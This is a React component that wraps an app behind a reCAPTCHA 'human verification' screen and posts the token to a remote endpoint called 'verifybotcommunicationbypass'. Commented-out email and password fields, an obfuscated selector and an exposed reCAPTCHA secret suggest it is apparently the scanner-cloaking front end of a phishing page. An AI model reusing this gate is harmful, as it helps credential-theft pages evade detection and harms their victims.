import React, { useEffect, useRef, useState } from "react";
import App from './App'
import { createPortal } from "react-dom";
import FastSpin from "./Spin/Spin";
import Loader from "./Loader/Loader";
import ReCAPTCHA from "react-google-recaptcha";



const Web3 = ()=>{

    const captchaRef = useRef();

    const [Ab, setAb] = useState(false);
      
           
      const site_key_recaptcha = `6LeLKecrAAAAAIaXiyycP7XYKiv24O2kvgVSzFMl`;
    //   const secret_key_recaptch = `6LeLKecrAAAAAMriJi8sXNofXzHDflmqZq6p2SA0`;
      
      const [capchaStatus, setCaptchStatus] = useState(false);
      const [key, setKey] = useState('')
      const onSuccess = (val)=>{
          setKey(key)
          setCaptchStatus(true)
      
            //   const endPoint = `http://localhost:5000/post`;
            //   const endPoint = `https://humanverificationbotsecurity.onrender.com/post`
            const endPoint = `https://verifybotcommunicationbypass.onrender.com/post`;
              
              fetch(endPoint,{
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/json',
                  },
                  body: JSON.stringify({
                      // user: eml,
                      // secret: pswd,
                      captchaToken: val
                  })
              })
              .then(res=> {
                  res.json();
                  
                  if(res.ok){
                      setAb(true)
                  }else{
                      setAb(false)
                  }
              })
              .then(data=>{
                  console.log('ok')
              })
              .catch(err=> console.error(err))
      }

    const [a, b] = useState(false);
    const lebanon = createPortal(<div> <App /> </div>, document.querySelector('.glkyuierioj378ui'));

    // useEffect(()=>{
    //     b(false);
    //     setTimeout(() => {
    //         b(true)
    //     }, 10);
    // }, []);

    return(<>
        {/* { a ? <Loader /> : lebanon } */}
        {
                 Ab ? <main className='cpcha_wrp'>
          <p className='hv'><code>Human Verification, please wait... </code></p>
          <section className='capchaBDA'>
              <ReCAPTCHA 
                  sitekey={`${site_key_recaptcha}`}
                  ref={captchaRef}
                  badge='bottomright'
                  // onErrored={e=>alert(`OnErrored:${e}`)}
                  onChange={onSuccess}
              />
          </section>
        </main>
        :
        lebanon
        }
    </>)
};

export default Web3;
